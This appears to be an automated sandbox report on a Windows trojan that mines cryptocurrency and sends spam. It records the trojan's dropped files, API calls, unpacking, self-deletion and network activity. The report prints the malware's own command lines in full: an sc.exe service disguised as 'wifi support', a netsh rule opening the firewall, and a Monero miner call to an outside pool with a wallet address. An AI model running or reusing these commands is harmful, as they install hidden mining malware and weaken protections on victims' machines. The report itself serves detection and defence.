Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MINER_monero_mining_detection date = 2018-04-05, actor_group = Unknown, actor_type = Cybercrime, author = Christiaan Beek \| McAfee ATR Team, description = Monero mining software, malware_family = Ransom:W32/MoneroMiner, rule_version = v1, malware_type = miner

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\SysWOW64\mmeemcze\

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: String function: 02232794 appears 35 times
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: String function: 0040EE2A appears 38 times
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: String function: 00402544 appears 53 times

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00408E26

Source: HsWJJz7nq4.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kwrovuui.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: HsWJJz7nq4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.troj.evad.mine.winEXE@26/4@660/75

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,RtlAllocateHeap,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,		0_2_00409A6B
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Code function: 14_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,RtlAllocateHeap,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,		14_2_00409A6B

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,RtlAllocateHeap,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

0_2_00409A6B

Source: HsWJJz7nq4.exe	Virustotal: Detection: 31%
Source: HsWJJz7nq4.exe	ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

File read: C:\Users\user\Desktop\HsWJJz7nq4.exe

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HsWJJz7nq4.exe 'C:\Users\user\Desktop\HsWJJz7nq4.exe'
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\mmeemcze\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support'
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' description mmeemcze 'wifi internet conection'
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' start mmeemcze
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d'C:\Users\user\Desktop\HsWJJz7nq4.exe'
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\mmeemcze\	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support'	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' description mmeemcze 'wifi internet conection'	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' start mmeemcze	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul	Jump to behavior
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half	Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

File created: C:\Users\user\AppData\Local\Temp\kwrovuui.exe

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,

0_2_00406A60

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4420:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01

Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: HsWJJz7nq4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\lejasumefelaw\bahonifapenaho\heciyow\wo.pdb source: HsWJJz7nq4.exe
Source:	Binary string: PC:\lejasumefelaw\bahonifapenaho\heciyow\wo.pdb source: HsWJJz7nq4.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Unpacked PE file: 0.2.HsWJJz7nq4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Unpacked PE file: 14.2.kwrovuui.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,

0_2_00406069

Source: kwrovuui.exe.0.dr

Static PE information: real checksum: 0x5066d should be:

Source: initial sample	Static PE information: section name: .text entropy: 7.53991831646
Source: initial sample	Static PE information: section name: .text entropy: 7.53991831646

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: unknown

Executable created and started: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	File created: C:\Users\user\AppData\Local\Temp\kwrovuui.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe (copy)			Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe (copy)

Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mmeemcze

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support'

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

0_2_00409A6B

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\SysWOW64\svchost.exe

File deleted: c:\users\user\desktop\hswjjz7nq4.exe

Jump to behavior

Creates files in alternative data streams (ADS)

Show sources

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Windows\SysWOW64\config\systemprofile:.repos

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value created or modified: HKEY_USERS.DEFAULT\Control Panel\Buses Config1

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00401000

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe TID: 4868	Thread sleep count: 190 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 4868	Thread sleep time: -1900000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6204	Thread sleep count: 531 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6204	Thread sleep count: 55 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 4832	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5936	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5936	Thread sleep time: -465000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5040	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2428	Thread sleep count: 203 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2428	Thread sleep time: -2030000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\svchost.exe

Window / User API: threadDelayed 531

Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,

0_2_00401D96

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,

0_2_00406069

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: 0_2_0223092B mov eax, dword ptr fs:[00000030h]	0_2_0223092B
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: 0_2_02230D90 mov eax, dword ptr fs:[00000030h]	0_2_02230D90
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Code function: 14_2_0216092B mov eax, dword ptr fs:[00000030h]	14_2_0216092B
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Code function: 14_2_02160D90 mov eax, dword ptr fs:[00000030h]	14_2_02160D90

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_0040EBCC GetProcessHeap,RtlAllocateHeap,

0_2_0040EBCC

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,RtlAllocateHeap,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,		0_2_00409A6B
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Code function: 14_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,RtlAllocateHeap,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,		14_2_00409A6B

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.120.69.2 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-00262c01.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wi.rr.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rediffmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: energyjustice.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: controlling.cz
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx-01-us-east-2.prod.hydra.sophos.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.cbl.abuseat.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: vallipartners.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 209.222.82.255 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: btinternet.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 142.250.150.27 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: o2.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.zen.spamhaus.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.156.240 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.162.106.154 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 194019900.pamx1.hotmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: fastpool.xyz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 96.114.157.80 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: anntaylor.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.webmailious.top
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gmai.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbgaskill.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cbs.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx01.mail.icloud.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 211.231.108.176 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.comcast.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.162.196.70 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbesing.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lorentzmeats.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 212.27.48.6 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: alt1.gmail-smtp-in.l.google.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cluster1.us.messagelabs.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: freenet.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.8.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.privateemail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.222.135.150 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 40.93.207.1 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.lycos.com.cust.b.hostedemail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: prodigy.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.in-addr.arpa
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.57.161 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.interia.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-00217301.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 62.141.42.208 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: unicauca.edu.co
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.google.co.cr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: t-online.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.228.106 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx00.emig.kundenserver.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.mailchannels.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 98.136.96.93 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 66.111.4.73 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 66.111.4.74 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx4.mail.ovh.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: d123140a.ess.barracudanetworks.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbfs.id.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: d314473.a.ess.de.barracudanetworks.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sydstu.catholic.edu.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.tlen.pl
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.244.49.115 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 87.98.164.155 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 5.61.37.41 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 95.216.195.92 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 195.4.92.218 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.228.111 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: education.nsw.gov.au
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.41 423	Jump to behavior
